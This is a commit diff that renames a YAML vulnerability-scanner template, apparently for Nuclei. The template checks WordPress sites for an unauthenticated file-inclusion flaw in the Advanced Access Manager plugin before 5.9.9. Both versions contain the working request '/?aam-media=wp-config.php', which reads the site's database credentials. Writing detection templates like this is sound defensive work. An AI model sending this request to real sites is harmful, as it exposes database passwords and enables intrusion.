Update and rename advanced-access-manager-plugin-lfi.yaml to vulnerabilities/wordpress/advanced-access-manager-lfi.yaml

advanced-access-manager-plugin-lfi.yaml

@@ -1,26 +0,0 @@
-id: advanced-access-manager-plugin-lfi
-
-info:
-  name: Advanced Access Manager < 5.9.9 - Unauthenticated Local File Inclusion
-  author: 0x_Akoko
-  severity: high
-  tags: wordpress,wp-plugin,lfi,wp
-  reference: https://wpscan.com/vulnerability/9873
-
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/?aam-media=wp-config.php '
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "DB_NAME"
-          - "DB_PASSWORD"
-        part: body
-        condition: and
-
-      - type: status
-        status:
-          - 200

vulnerabilities/wordpress/advanced-access-manager-lfi.yaml

@@ -0,0 +1,29 @@
+id: advanced-access-manager-lfi
+
+info:
+  name: Advanced Access Manager < 5.9.9 - Unauthenticated Local File Inclusion
+  author: 0x_Akoko
+  severity: high
+  description: The Advanced Access Manager WordPress plugin, versions before 5.9.9, allowed reading arbitrary files. This way one can download the wp-config.php file and get access to the database, which is publicly reachable on many servers.
+  reference:
+    - https://wpscan.com/vulnerability/9873
+    - https://id.wordpress.org/plugins/advanced-access-manager/
+  tags: wordpress,wp-plugin,lfi
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/?aam-media=wp-config.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200